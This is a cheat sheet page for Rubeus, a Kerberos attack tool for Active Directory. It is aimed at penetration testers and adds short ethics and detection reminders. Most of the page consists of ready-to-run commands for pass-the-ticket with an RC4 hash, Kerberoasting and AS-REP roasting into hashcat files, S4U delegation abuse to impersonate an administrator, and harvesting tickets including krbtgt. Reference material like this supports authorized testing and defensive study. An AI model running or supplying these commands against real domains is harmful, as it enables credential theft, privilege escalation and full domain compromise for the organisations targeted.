CyberCheatsheets

Rubeus Cheat Sheet

Kerberos abuse toolkit for ticket requests, roasting, and delegation attacks.

Active Directory & WindowsadkerberosroastticketsUpdated 2026-06-02

Overview

Rubeus is a C# toolkit for Kerberos operations on Windows: TGT/TGS requests, Kerberoasting, AS-REP roasting, golden/silver tickets (in advanced scenarios), and delegation abuse. Run on authorized domain-joined or attacker-controlled Windows hosts in lab/pentest—AV often flags it. Ethics: ticket forging and roasting compromise the domain; never use outside written scope.

Install

Compile or use prebuilt Rubeus.exe in isolated VM

Rubeus.exe

Essential commands

Rubeus.exe asktgt /user:j.doe /password:Password1! /domain:corp.local /dc:dc01.corp.local /ptt
Rubeus.exe kerberoast /outfile:hashes.txt
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Rubeus.exe klist

Common workflows

Request and inject TGT (pass-the-ticket) —

Rubeus.exe asktgt /user:administrator /rc4:31D6CFE0D16AE931B73C59D7E0C089C0 /domain:corp.local /ptt
Rubeus.exe klist

Kerberoast (SPN accounts) —

Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svc_sql /outfile:roast.txt

AS-REP roast —

Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Rubeus.exe asreproast /user:donotpreauth /format:hashcat

TGS for service (constrained / S4U when applicable) —

Rubeus.exe s4u /user:svc /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/dc01.corp.local /ptt

Monitor / harvest tickets —

Rubeus.exe monitor /interval:5 /filteruser:administrator
Rubeus.exe triage
Rubeus.exe dump /luid:0x12345 /service:krbtgt /nowrap

Renew / purge —

Rubeus.exe renew /ticket:<base64>
Rubeus.exe purge

Flags reference

asktgt

/user, /password, /rc4, /ptt

kerberoast

/user, /outfile

asreproast

/format:hashcat

s4u

/impersonateuser, /msdsspn

ptt

/ticket

purge

Tips

  • Ethics: roasting generates 4769 events; AS-REP and golden-ticket paths are critical findings—report immediately in prod tests.
  • Prefer impacket-GetUserSPNs / GetNPUsers from Linux when you lack GUI shell on Windows.
  • Use /nowrap for hashcat-friendly lines; verify -m 13100 vs 18200.
  • Run from sacrificial process or dev VM; expect EDR quarantine on corporate endpoints.

References

Related cheat sheets